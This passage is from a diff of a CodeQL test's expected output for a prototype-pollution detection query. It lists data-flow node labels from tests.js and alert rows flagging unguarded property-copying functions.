tests.js:149:36:149:38 | src | semmle.label | src | -| tests.js:150:14:150:16 | key | semmle.label | key | -| tests.js:152:22:152:24 | dst | semmle.label | dst | -| tests.js:152:27:152:29 | src | semmle.label | src | -| tests.js:152:32:152:34 | key | semmle.label | key | -| tests.js:154:13:154:15 | dst | semmle.label | dst | -| tests.js:154:17:154:19 | key | semmle.label | key | -| tests.js:154:24:154:26 | src | semmle.label | src | -| tests.js:154:24:154:31 | src[key] | semmle.label | src[key] | -| tests.js:154:28:154:30 | key | semmle.label | key | -| tests.js:159:36:159:38 | dst | semmle.label | dst | -| tests.js:159:41:159:43 | src | semmle.label | src | -| tests.js:160:26:160:28 | dst | semmle.label | dst | -| tests.js:160:31:160:33 | src | semmle.label | src | -| tests.js:160:37:160:39 | dst | semmle.label | dst | -| tests.js:160:42:160:44 | src | semmle.label | src | -| tests.js:160:47:160:49 | key | semmle.label | key | -| tests.js:161:35:161:37 | dst | semmle.label | dst | -| tests.js:161:35:161:42 | dst[key] | semmle.label | dst[key] | -| tests.js:161:39:161:41 | key | semmle.label | key | -| tests.js:161:45:161:47 | src | semmle.label | src | -| tests.js:161:45:161:52 | src[key] | semmle.label | src[key] | -| tests.js:161:49:161:51 | key | semmle.label | key | -| tests.js:165:37:165:39 | src | semmle.label | src | -| tests.js:166:14:166:16 | key | semmle.label | key | -| tests.js:169:45:169:47 | src | semmle.label | src | -| tests.js:169:45:169:52 | src[key] | semmle.label | src[key] | -| tests.js:169:49:169:51 | key | semmle.label | key | -| tests.js:171:17:171:19 | key | semmle.label | key | -| tests.js:171:24:171:26 | src | semmle.label | src | -| tests.js:171:24:171:31 | src[key] | semmle.label | src[key] | -| tests.js:171:28:171:30 | key | semmle.label | key | -| tests.js:178:33:178:35 | src | semmle.label | src | -| tests.js:182:41:182:43 | src | semmle.label | src | -| tests.js:182:41:182:48 | src[key] | semmle.label | src[key] | -| 
tests.js:184:24:184:26 | src | semmle.label | src | -| tests.js:184:24:184:31 | src[key] | semmle.label | src[key] | -| tests.js:189:32:189:34 | dst | semmle.label | dst | -| tests.js:189:37:189:39 | src | semmle.label | src | -| tests.js:192:13:192:25 | key | semmle.label | key | -| tests.js:192:19:192:25 | keys[i] | semmle.label | keys[i] | -| tests.js:194:35:194:37 | dst | semmle.label | dst | -| tests.js:194:35:194:42 | dst[key] | semmle.label | dst[key] | -| tests.js:194:39:194:41 | key | semmle.label | key | -| tests.js:194:45:194:47 | src | semmle.label | src | -| tests.js:194:45:194:52 | src[key] | semmle.label | src[key] | -| tests.js:194:49:194:51 | key | semmle.label | key | -| tests.js:196:13:196:15 | dst | semmle.label | dst | -| tests.js:196:17:196:19 | key | semmle.label | key | -| tests.js:196:24:196:26 | src | semmle.label | src | -| tests.js:196:24:196:31 | src[key] | semmle.label | src[key] | -| tests.js:196:28:196:30 | key | semmle.label | key | -| tests.js:201:39:201:41 | dst | semmle.label | dst | -| tests.js:201:44:201:46 | src | semmle.label | src | -| tests.js:206:42:206:44 | dst | semmle.label | dst | -| tests.js:206:42:206:53 | dst[keys[i]] | semmle.label | dst[keys[i]] | -| tests.js:206:46:206:52 | keys[i] | semmle.label | keys[i] | -| tests.js:206:56:206:58 | src | semmle.label | src | -| tests.js:206:56:206:67 | src[keys[i]] | semmle.label | src[keys[i]] | -| tests.js:206:60:206:66 | keys[i] | semmle.label | keys[i] | -| tests.js:208:13:208:15 | dst | semmle.label | dst | -| tests.js:208:17:208:23 | keys[i] | semmle.label | keys[i] | -| tests.js:208:28:208:30 | src | semmle.label | src | -| tests.js:208:28:208:39 | src[keys[i]] | semmle.label | src[keys[i]] | -| tests.js:208:32:208:38 | keys[i] | semmle.label | keys[i] | -| tests.js:213:23:213:26 | key1 | semmle.label | key1 | -| tests.js:213:29:213:32 | key2 | semmle.label | key2 | -| tests.js:213:35:213:39 | value | semmle.label | value | -| tests.js:217:5:217:13 | map[key1] | 
semmle.label | map[key1] | -| tests.js:217:9:217:12 | key1 | semmle.label | key1 | -| tests.js:217:15:217:18 | key2 | semmle.label | key2 | -| tests.js:217:23:217:27 | value | semmle.label | value | -| tests.js:223:14:223:16 | key | semmle.label | key | -| tests.js:224:23:224:25 | key | semmle.label | key | -| tests.js:224:33:224:41 | data[key] | semmle.label | data[key] | -| tests.js:224:38:224:40 | key | semmle.label | key | -| tests.js:225:28:225:30 | key | semmle.label | key | -| tests.js:225:33:225:41 | data[key] | semmle.label | data[key] | -| tests.js:225:38:225:40 | key | semmle.label | key | -| tests.js:229:26:229:29 | key1 | semmle.label | key1 | -| tests.js:229:32:229:35 | key2 | semmle.label | key2 | -| tests.js:229:38:229:42 | value | semmle.label | value | -| tests.js:233:5:233:13 | map[key1] | semmle.label | map[key1] | -| tests.js:233:9:233:12 | key1 | semmle.label | key1 | -| tests.js:233:15:233:18 | key2 | semmle.label | key2 | -| tests.js:233:23:233:27 | value | semmle.label | value | -| tests.js:238:14:238:16 | key | semmle.label | key | -| tests.js:239:24:239:26 | key | semmle.label | key | -| tests.js:239:34:239:42 | data[key] | semmle.label | data[key] | -| tests.js:239:39:239:41 | key | semmle.label | key | -| tests.js:240:31:240:33 | key | semmle.label | key | -| tests.js:240:36:240:44 | data[key] | semmle.label | data[key] | -| tests.js:240:41:240:43 | key | semmle.label | key | -| tests.js:263:27:263:29 | dst | semmle.label | dst | -| tests.js:265:13:265:26 | key | semmle.label | key | -| tests.js:265:19:265:26 | entry[0] | semmle.label | entry[0] | -| tests.js:266:13:266:28 | value | semmle.label | value | -| tests.js:266:21:266:28 | entry[1] | semmle.label | entry[1] | -| tests.js:268:30:268:32 | dst | semmle.label | dst | -| tests.js:268:30:268:37 | dst[key] | semmle.label | dst[key] | -| tests.js:268:34:268:36 | key | semmle.label | key | -| tests.js:270:13:270:15 | dst | semmle.label | dst | -| tests.js:270:17:270:19 | key | 
semmle.label | key | -| tests.js:270:24:270:28 | value | semmle.label | value | -| tests.js:275:27:275:29 | dst | semmle.label | dst | -| tests.js:275:32:275:34 | src | semmle.label | src | -| tests.js:276:21:276:23 | src | semmle.label | src | -| tests.js:276:34:276:36 | key | semmle.label | key | -| tests.js:278:30:278:32 | dst | semmle.label | dst | -| tests.js:278:30:278:37 | dst[key] | semmle.label | dst[key] | -| tests.js:278:34:278:36 | key | semmle.label | key | -| tests.js:278:40:278:42 | src | semmle.label | src | -| tests.js:278:40:278:47 | src[key] | semmle.label | src[key] | -| tests.js:278:44:278:46 | key | semmle.label | key | -| tests.js:280:13:280:15 | dst | semmle.label | dst | -| tests.js:280:17:280:19 | key | semmle.label | key | -| tests.js:280:24:280:26 | src | semmle.label | src | -| tests.js:280:24:280:31 | src[key] | semmle.label | src[key] | -| tests.js:280:28:280:30 | key | semmle.label | key | -| tests.js:301:27:301:29 | dst | semmle.label | dst | -| tests.js:301:32:301:34 | src | semmle.label | src | -| tests.js:302:14:302:16 | key | semmle.label | key | -| tests.js:304:17:304:32 | value | semmle.label | value | -| tests.js:304:17:304:32 | value | semmle.label | value | -| tests.js:304:17:304:32 | value | semmle.label | value | -| tests.js:304:25:304:27 | src | semmle.label | src | -| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | -| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | -| tests.js:304:25:304:32 | src[key] | semmle.label | src[key] | -| tests.js:304:29:304:31 | key | semmle.label | key | -| tests.js:306:34:306:36 | dst | semmle.label | dst | -| tests.js:306:34:306:41 | dst[key] | semmle.label | dst[key] | -| tests.js:306:38:306:40 | key | semmle.label | key | -| tests.js:306:44:306:48 | value | semmle.label | value | -| tests.js:308:17:308:19 | dst | semmle.label | dst | -| tests.js:308:21:308:23 | key | semmle.label | key | -| tests.js:308:28:308:32 | value | semmle.label | value | -| 
tests.js:314:31:314:33 | dst | semmle.label | dst | -| tests.js:314:36:314:38 | src | semmle.label | src | -| tests.js:315:14:315:16 | key | semmle.label | key | -| tests.js:318:17:318:32 | value | semmle.label | value | -| tests.js:318:17:318:32 | value | semmle.label | value | -| tests.js:318:17:318:32 | value | semmle.label | value | -| tests.js:318:25:318:27 | src | semmle.label | src | -| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | -| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | -| tests.js:318:25:318:32 | src[key] | semmle.label | src[key] | -| tests.js:318:29:318:31 | key | semmle.label | key | -| tests.js:320:38:320:40 | dst | semmle.label | dst | -| tests.js:320:38:320:45 | dst[key] | semmle.label | dst[key] | -| tests.js:320:42:320:44 | key | semmle.label | key | -| tests.js:320:48:320:52 | value | semmle.label | value | -| tests.js:322:17:322:19 | dst | semmle.label | dst | -| tests.js:322:21:322:23 | key | semmle.label | key | -| tests.js:322:28:322:32 | value | semmle.label | value | -| tests.js:328:25:328:27 | dst | semmle.label | dst | -| tests.js:328:30:328:32 | src | semmle.label | src | -| tests.js:329:14:329:16 | key | semmle.label | key | -| tests.js:336:32:336:34 | dst | semmle.label | dst | -| tests.js:336:32:336:39 | dst[key] | semmle.label | dst[key] | -| tests.js:336:36:336:38 | key | semmle.label | key | -| tests.js:336:42:336:44 | src | semmle.label | src | -| tests.js:336:42:336:49 | src[key] | semmle.label | src[key] | -| tests.js:336:46:336:48 | key | semmle.label | key | -| tests.js:338:17:338:19 | dst | semmle.label | dst | -| tests.js:338:21:338:23 | key | semmle.label | key | -| tests.js:338:28:338:30 | src | semmle.label | src | -| tests.js:338:28:338:35 | src[key] | semmle.label | src[key] | -| tests.js:338:32:338:34 | key | semmle.label | key | -| tests.js:348:32:348:37 | target | semmle.label | target | -| tests.js:348:40:348:45 | source | semmle.label | source | -| tests.js:349:26:349:31 | 
target | semmle.label | target | -| tests.js:349:54:349:59 | source | semmle.label | source | -| tests.js:350:21:350:26 | source | semmle.label | source | -| tests.js:350:37:350:39 | key | semmle.label | key | -| tests.js:355:17:355:22 | target | semmle.label | target | -| tests.js:355:24:355:26 | key | semmle.label | key | -| tests.js:355:31:355:86 | mergePl ... ptions) | semmle.label | mergePl ... ptions) | -| tests.js:355:53:355:58 | target | semmle.label | target | -| tests.js:355:53:355:63 | target[key] | semmle.label | target[key] | -| tests.js:355:60:355:62 | key | semmle.label | key | -| tests.js:355:66:355:71 | source | semmle.label | source | -| tests.js:355:66:355:76 | source[key] | semmle.label | source[key] | -| tests.js:357:17:357:22 | target | semmle.label | target | -| tests.js:357:24:357:26 | key | semmle.label | key | -| tests.js:357:31:357:36 | source | semmle.label | source | -| tests.js:357:31:357:41 | source[key] | semmle.label | source[key] | -| tests.js:357:38:357:40 | key | semmle.label | key | -| tests.js:361:12:361:17 | target | semmle.label | target | -| tests.js:364:41:364:46 | target | semmle.label | target | -| tests.js:364:49:364:54 | source | semmle.label | source | -| tests.js:366:18:366:20 | key | semmle.label | key | -| tests.js:371:24:371:26 | key | semmle.label | key | -| tests.js:371:31:371:95 | mergePl ... ptions) | semmle.label | mergePl ... 
ptions) | -| tests.js:371:62:371:72 | target[key] | semmle.label | target[key] | -| tests.js:371:69:371:71 | key | semmle.label | key | -| tests.js:371:75:371:80 | source | semmle.label | source | -| tests.js:371:75:371:85 | source[key] | semmle.label | source[key] | -| tests.js:373:24:373:26 | key | semmle.label | key | -| tests.js:373:31:373:36 | source | semmle.label | source | -| tests.js:373:31:373:41 | source[key] | semmle.label | source[key] | -| tests.js:373:38:373:40 | key | semmle.label | key | -| tests.js:377:12:377:17 | target | semmle.label | target | -| tests.js:380:22:380:24 | obj | semmle.label | obj | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [dst] | semmle.label | callback [dst] | -| tests.js:380:27:380:34 | callback [src] | semmle.label | callback [src] | -| tests.js:381:14:381:16 | key | semmle.label | key | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [dst] | semmle.label | callback [dst] | -| tests.js:383:13:383:20 | callback [src] | semmle.label | callback [src] | -| tests.js:383:22:383:24 | key | semmle.label | key | -| tests.js:383:27:383:29 | obj | semmle.label | obj | -| tests.js:383:27:383:34 | obj[key] | semmle.label | obj[key] | -| tests.js:383:31:383:33 | key | semmle.label | key | -| tests.js:388:29:388:31 | dst | semmle.label | dst | -| tests.js:388:29:388:31 | dst | semmle.label | dst | -| tests.js:388:34:388:36 | src | semmle.label | src | -| tests.js:389:17:389:19 | src | semmle.label | src | -| tests.js:389:22:389:24 | key | semmle.label | key | -| tests.js:391:32:391:34 | dst | 
semmle.label | dst | -| tests.js:391:32:391:34 | dst | semmle.label | dst | -| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | -| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | -| tests.js:391:36:391:38 | key | semmle.label | key | -| tests.js:391:42:391:44 | src | semmle.label | src | -| tests.js:391:42:391:49 | src[key] | semmle.label | src[key] | -| tests.js:391:46:391:48 | key | semmle.label | key | -| tests.js:393:13:393:15 | dst | semmle.label | dst | -| tests.js:393:17:393:19 | key | semmle.label | key | -| tests.js:393:24:393:26 | src | semmle.label | src | -| tests.js:393:24:393:31 | src[key] | semmle.label | src[key] | -| tests.js:393:28:393:30 | key | semmle.label | key | -| tests.js:398:30:398:32 | dst | semmle.label | dst | -| tests.js:398:30:398:32 | dst | semmle.label | dst | -| tests.js:398:35:398:37 | src | semmle.label | src | -| tests.js:399:17:399:19 | src | semmle.label | src | -| tests.js:399:23:399:25 | key | semmle.label | key | -| tests.js:399:28:399:32 | value | semmle.label | value | -| tests.js:401:33:401:35 | dst | semmle.label | dst | -| tests.js:401:33:401:35 | dst | semmle.label | dst | -| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | -| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | -| tests.js:401:37:401:39 | key | semmle.label | key | -| tests.js:401:43:401:47 | value | semmle.label | value | -| tests.js:403:13:403:15 | dst | semmle.label | dst | -| tests.js:403:17:403:19 | key | semmle.label | key | -| tests.js:403:24:403:28 | value | semmle.label | value | -| tests.js:408:22:408:24 | obj | semmle.label | obj | -| tests.js:408:27:408:29 | key | semmle.label | key | -| tests.js:409:12:409:14 | obj | semmle.label | obj | -| tests.js:409:12:409:19 | obj[key] | semmle.label | obj[key] | -| tests.js:409:16:409:18 | key | semmle.label | key | -| tests.js:412:31:412:33 | dst | semmle.label | dst | -| tests.js:412:36:412:38 | src | semmle.label | src | -| tests.js:413:14:413:16 
| key | semmle.label | key | -| tests.js:414:13:414:41 | value | semmle.label | value | -| tests.js:414:21:414:41 | wrapped ... c, key) | semmle.label | wrapped ... c, key) | -| tests.js:414:33:414:35 | src | semmle.label | src | -| tests.js:414:38:414:40 | key | semmle.label | key | -| tests.js:415:13:415:42 | target | semmle.label | target | -| tests.js:415:22:415:42 | wrapped ... t, key) | semmle.label | wrapped ... t, key) | -| tests.js:415:34:415:36 | dst | semmle.label | dst | -| tests.js:415:39:415:41 | key | semmle.label | key | -| tests.js:417:34:417:39 | target | semmle.label | target | -| tests.js:417:42:417:46 | value | semmle.label | value | -| tests.js:419:13:419:15 | dst | semmle.label | dst | -| tests.js:419:17:419:19 | key | semmle.label | key | -| tests.js:419:24:419:28 | value | semmle.label | value | -| tests.js:424:25:424:27 | obj | semmle.label | obj | -| tests.js:424:30:424:32 | key | semmle.label | key | -| tests.js:426:12:426:14 | obj | semmle.label | obj | -| tests.js:426:12:426:19 | obj[key] | semmle.label | obj[key] | -| tests.js:426:16:426:18 | key | semmle.label | key | -| tests.js:429:34:429:36 | dst | semmle.label | dst | -| tests.js:429:39:429:41 | src | semmle.label | src | -| tests.js:430:14:430:16 | key | semmle.label | key | -| tests.js:431:13:431:44 | value | semmle.label | value | -| tests.js:431:21:431:44 | almostS ... c, key) | semmle.label | almostS ... c, key) | -| tests.js:431:36:431:38 | src | semmle.label | src | -| tests.js:431:41:431:43 | key | semmle.label | key | -| tests.js:432:13:432:45 | target | semmle.label | target | -| tests.js:432:22:432:45 | almostS ... t, key) | semmle.label | almostS ... 
t, key) | -| tests.js:432:37:432:39 | dst | semmle.label | dst | -| tests.js:432:42:432:44 | key | semmle.label | key | -| tests.js:434:37:434:42 | target | semmle.label | target | -| tests.js:434:45:434:49 | value | semmle.label | value | -| tests.js:436:13:436:15 | dst | semmle.label | dst | -| tests.js:436:17:436:19 | key | semmle.label | key | -| tests.js:436:24:436:28 | value | semmle.label | value | -| tests.js:441:19:441:21 | obj | semmle.label | obj | -| tests.js:443:12:443:14 | obj | semmle.label | obj | -| tests.js:443:12:443:19 | obj[key] | semmle.label | obj[key] | -| tests.js:446:33:446:35 | src | semmle.label | src | -| tests.js:447:14:447:16 | key | semmle.label | key | -| tests.js:448:13:448:38 | value | semmle.label | value | -| tests.js:448:21:448:38 | safeRead(src, key) | semmle.label | safeRead(src, key) | -| tests.js:448:30:448:32 | src | semmle.label | src | -| tests.js:451:39:451:43 | value | semmle.label | value | -| tests.js:453:17:453:19 | key | semmle.label | key | -| tests.js:453:24:453:28 | value | semmle.label | value | -| tests.js:458:26:458:28 | dst | semmle.label | dst | -| tests.js:458:31:458:33 | src | semmle.label | src | -| tests.js:460:12:460:14 | src | semmle.label | src | -| tests.js:460:18:460:22 | value | semmle.label | value | -| tests.js:460:25:460:27 | key | semmle.label | key | -| tests.js:462:29:462:31 | dst | semmle.label | dst | -| tests.js:462:29:462:36 | dst[key] | semmle.label | dst[key] | -| tests.js:462:33:462:35 | key | semmle.label | key | -| tests.js:462:39:462:41 | src | semmle.label | src | -| tests.js:462:39:462:46 | src[key] | semmle.label | src[key] | -| tests.js:462:43:462:45 | key | semmle.label | key | -| tests.js:465:30:465:32 | dst | semmle.label | dst | -| tests.js:465:34:465:36 | key | semmle.label | key | -| tests.js:465:41:465:43 | src | semmle.label | src | -| tests.js:465:41:465:48 | src[key] | semmle.label | src[key] | -| tests.js:465:45:465:47 | key | semmle.label | key | -| 
tests.js:466:30:466:32 | dst | semmle.label | dst | -| tests.js:466:34:466:36 | key | semmle.label | key | -| tests.js:466:41:466:46 | o[key] | semmle.label | o[key] | -| tests.js:466:43:466:45 | key | semmle.label | key | -| tests.js:467:30:467:32 | dst | semmle.label | dst | -| tests.js:467:34:467:36 | key | semmle.label | key | -| tests.js:467:41:467:45 | value | semmle.label | value | -| tests.js:472:38:472:40 | dst | semmle.label | dst | -| tests.js:473:18:473:22 | value | semmle.label | value | -| tests.js:473:25:473:27 | key | semmle.label | key | -| tests.js:475:41:475:43 | dst | semmle.label | dst | -| tests.js:475:41:475:48 | dst[key] | semmle.label | dst[key] | -| tests.js:475:45:475:47 | key | semmle.label | key | -| tests.js:477:13:477:15 | dst | semmle.label | dst | -| tests.js:477:17:477:19 | key | semmle.label | key | -| tests.js:477:24:477:28 | value | semmle.label | value | -| tests.js:483:26:483:28 | dst | semmle.label | dst | -| tests.js:483:31:483:33 | src | semmle.label | src | -| tests.js:483:31:483:33 | src | semmle.label | src | -| tests.js:484:14:484:16 | key | semmle.label | key | -| tests.js:487:29:487:31 | dst | semmle.label | dst | -| tests.js:487:29:487:36 | dst[key] | semmle.label | dst[key] | -| tests.js:487:33:487:35 | key | semmle.label | key | -| tests.js:487:39:487:41 | src | semmle.label | src | -| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | -| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | -| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | -| tests.js:487:43:487:45 | key | semmle.label | key | -| tests.js:489:13:489:15 | dst | semmle.label | dst | -| tests.js:489:17:489:19 | key | semmle.label | key | -| tests.js:489:24:489:26 | src | semmle.label | src | -| tests.js:489:24:489:31 | src[key] | semmle.label | src[key] | -| tests.js:489:28:489:30 | key | semmle.label | key | -| tests.js:494:32:494:34 | src | semmle.label | src | -| tests.js:495:14:495:16 | key | semmle.label | key | 
-| tests.js:498:13:498:28 | value | semmle.label | value | -| tests.js:498:13:498:28 | value | semmle.label | value | -| tests.js:498:13:498:28 | value | semmle.label | value | -| tests.js:498:21:498:23 | src | semmle.label | src | -| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | -| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | -| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | -| tests.js:498:25:498:27 | key | semmle.label | key | -| tests.js:500:38:500:42 | value | semmle.label | value | -| tests.js:502:17:502:19 | key | semmle.label | key | -| tests.js:502:24:502:28 | value | semmle.label | value | -| tests.js:508:30:508:32 | dst | semmle.label | dst | -| tests.js:508:35:508:37 | src | semmle.label | src | -| tests.js:511:13:511:25 | key | semmle.label | key | -| tests.js:511:19:511:25 | keys[i] | semmle.label | keys[i] | -| tests.js:513:33:513:35 | dst | semmle.label | dst | -| tests.js:513:33:513:40 | dst[key] | semmle.label | dst[key] | -| tests.js:513:37:513:39 | key | semmle.label | key | -| tests.js:513:43:513:45 | src | semmle.label | src | -| tests.js:513:43:513:50 | src[key] | semmle.label | src[key] | -| tests.js:513:47:513:49 | key | semmle.label | key | -| tests.js:516:32:516:34 | src | semmle.label | src | -| tests.js:516:32:516:39 | src[key] | semmle.label | src[key] | -| tests.js:516:36:516:38 | key | semmle.label | key | -| tests.js:517:35:517:37 | dst | semmle.label | dst | -| tests.js:517:40:517:42 | key | semmle.label | key | -| tests.js:522:35:522:38 | args [0] | semmle.label | args [0] | -| tests.js:522:35:522:38 | args [1] | semmle.label | args [1] | -| tests.js:523:11:523:23 | dst | semmle.label | dst | -| tests.js:523:17:523:20 | args [0] | semmle.label | args [0] | -| tests.js:523:17:523:23 | args[0] | semmle.label | args[0] | -| tests.js:524:11:524:23 | src | semmle.label | src | -| tests.js:524:17:524:20 | args [1] | semmle.label | args [1] | -| tests.js:524:17:524:23 | args[1] | 
semmle.label | args[1] | -| tests.js:525:14:525:16 | key | semmle.label | key | -| tests.js:527:35:527:37 | dst | semmle.label | dst | -| tests.js:527:35:527:42 | dst[key] | semmle.label | dst[key] | -| tests.js:527:39:527:41 | key | semmle.label | key | -| tests.js:527:45:527:47 | src | semmle.label | src | -| tests.js:527:45:527:52 | src[key] | semmle.label | src[key] | -| tests.js:527:49:527:51 | key | semmle.label | key | -| tests.js:529:13:529:15 | dst | semmle.label | dst | -| tests.js:529:17:529:19 | key | semmle.label | key | -| tests.js:529:24:529:26 | src | semmle.label | src | -| tests.js:529:24:529:31 | src[key] | semmle.label | src[key] | -| tests.js:529:28:529:30 | key | semmle.label | key | -| tests.js:534:31:534:33 | obj | semmle.label | obj | -| tests.js:534:36:534:43 | callback [dst] | semmle.label | callback [dst] | -| tests.js:538:9:538:16 | callback [dst] | semmle.label | callback [dst] | -| tests.js:538:18:538:24 | keys[i] | semmle.label | keys[i] | -| tests.js:538:27:538:29 | obj | semmle.label | obj | -| tests.js:538:27:538:38 | obj[keys[i]] | semmle.label | obj[keys[i]] | -| tests.js:538:31:538:37 | keys[i] | semmle.label | keys[i] | -| tests.js:542:30:542:32 | dst | semmle.label | dst | -| tests.js:542:35:542:37 | src | semmle.label | src | -| tests.js:543:26:543:28 | src | semmle.label | src | -| tests.js:543:32:543:34 | key | semmle.label | key | -| tests.js:543:37:543:41 | value | semmle.label | value | -| tests.js:545:33:545:35 | dst | semmle.label | dst | -| tests.js:545:33:545:40 | dst[key] | semmle.label | dst[key] | -| tests.js:545:37:545:39 | key | semmle.label | key | -| tests.js:545:43:545:47 | value | semmle.label | value | -| tests.js:547:13:547:15 | dst | semmle.label | dst | -| tests.js:547:17:547:19 | key | semmle.label | key | -| tests.js:547:24:547:28 | value | semmle.label | value | -| tests.js:552:35:552:37 | src | semmle.label | src | -| tests.js:553:14:553:16 | key | semmle.label | key | -| tests.js:557:43:557:45 | 
src | semmle.label | src | -| tests.js:557:43:557:50 | src[key] | semmle.label | src[key] | -| tests.js:559:17:559:19 | key | semmle.label | key | -| tests.js:559:24:559:26 | src | semmle.label | src | -| tests.js:559:24:559:31 | src[key] | semmle.label | src[key] | -| tests.js:559:28:559:30 | key | semmle.label | key | -| tests.js:564:35:564:37 | src | semmle.label | src | -| tests.js:565:14:565:16 | key | semmle.label | key | -| tests.js:569:43:569:45 | src | semmle.label | src | -| tests.js:569:43:569:50 | src[key] | semmle.label | src[key] | -| tests.js:571:17:571:19 | key | semmle.label | key | -| tests.js:571:24:571:26 | src | semmle.label | src | -| tests.js:571:24:571:31 | src[key] | semmle.label | src[key] | -| tests.js:571:28:571:30 | key | semmle.label | key | -| tests.js:576:30:576:32 | src | semmle.label | src | -| tests.js:577:14:577:16 | key | semmle.label | key | -| tests.js:580:38:580:40 | src | semmle.label | src | -| tests.js:580:38:580:45 | src[key] | semmle.label | src[key] | -| tests.js:582:17:582:19 | key | semmle.label | key | -| tests.js:582:24:582:26 | src | semmle.label | src | -| tests.js:582:24:582:31 | src[key] | semmle.label | src[key] | -| tests.js:582:28:582:30 | key | semmle.label | key | -| tests.js:591:25:591:27 | obj | semmle.label | obj | -| tests.js:592:7:592:9 | obj | semmle.label | obj | -| tests.js:592:21:592:23 | obj | semmle.label | obj | -| tests.js:593:10:593:12 | obj | semmle.label | obj | -| tests.js:600:31:600:34 | dest | semmle.label | dest | -| tests.js:600:37:600:42 | source | semmle.label | source | -| tests.js:601:16:601:18 | key | semmle.label | key | -| tests.js:603:34:603:37 | dest | semmle.label | dest | -| tests.js:603:34:603:42 | dest[key] | semmle.label | dest[key] | -| tests.js:603:39:603:41 | key | semmle.label | key | -| tests.js:603:45:603:50 | source | semmle.label | source | -| tests.js:603:45:603:55 | source[key] | semmle.label | source[key] | -| tests.js:603:52:603:54 | key | semmle.label | key | 
-| tests.js:605:13:605:16 | dest | semmle.label | dest | -| tests.js:605:18:605:20 | key | semmle.label | key | -| tests.js:605:25:605:51 | capture ... e[key]) | semmle.label | capture ... e[key]) | -| tests.js:605:40:605:45 | source | semmle.label | source | -| tests.js:605:40:605:50 | source[key] | semmle.label | source[key] | -| tests.js:605:47:605:49 | key | semmle.label | key | +#select +| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | examples/PrototypePollutingFunction.js:2:14:2:16 | key | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | examples/PrototypePollutingFunction.js:2:21:2:23 | src | src | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | dst | +| path-assignment.js:15:13:15:18 | target | path-assignment.js:8:19:8:25 | keys[i] | path-assignment.js:15:13:15:18 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:8:19:8:25 | keys[i] | here | path-assignment.js:15:13:15:18 | target | target | +| path-assignment.js:44:5:44:10 | target | path-assignment.js:41:19:41:25 | keys[i] | path-assignment.js:44:5:44:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:41:19:41:25 | keys[i] | here | path-assignment.js:44:5:44:10 | target | target | +| path-assignment.js:61:5:61:10 | target | path-assignment.js:58:19:58:25 | keys[i] | path-assignment.js:61:5:61:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:58:19:58:25 | keys[i] | here | path-assignment.js:61:5:61:10 | target | target | +| path-assignment.js:71:5:71:10 | target | path-assignment.js:68:19:68:25 | keys[i] | path-assignment.js:71:5:71:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. 
| path-assignment.js:68:19:68:25 | keys[i] | here | path-assignment.js:71:5:71:10 | target | target | +| tests.js:8:13:8:15 | dst | tests.js:4:14:4:16 | key | tests.js:8:13:8:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:4:21:4:23 | src | src | tests.js:8:13:8:15 | dst | dst | +| tests.js:18:13:18:15 | dst | tests.js:14:30:14:32 | key | tests.js:18:13:18:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:14:17:14:19 | src | src | tests.js:18:13:18:15 | dst | dst | +| tests.js:36:9:36:11 | dst | tests.js:25:18:25:20 | key | tests.js:36:9:36:11 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:25:25:25:30 | source | source | tests.js:36:9:36:11 | dst | dst | +| tests.js:46:13:46:15 | dst | tests.js:41:14:41:16 | key | tests.js:46:13:46:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:41:21:41:23 | src | src | tests.js:46:13:46:15 | dst | dst | +| tests.js:57:13:57:15 | dst | tests.js:52:14:52:16 | key | tests.js:57:13:57:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:52:21:52:23 | src | src | tests.js:57:13:57:15 | dst | dst | +| tests.js:109:13:109:15 | dst | tests.js:102:14:102:16 | key | tests.js:109:13:109:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:102:21:102:23 | src | src | tests.js:109:13:109:15 | dst | dst | +| tests.js:154:13:154:15 | dst | tests.js:150:14:150:16 | key | tests.js:154:13:154:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. 
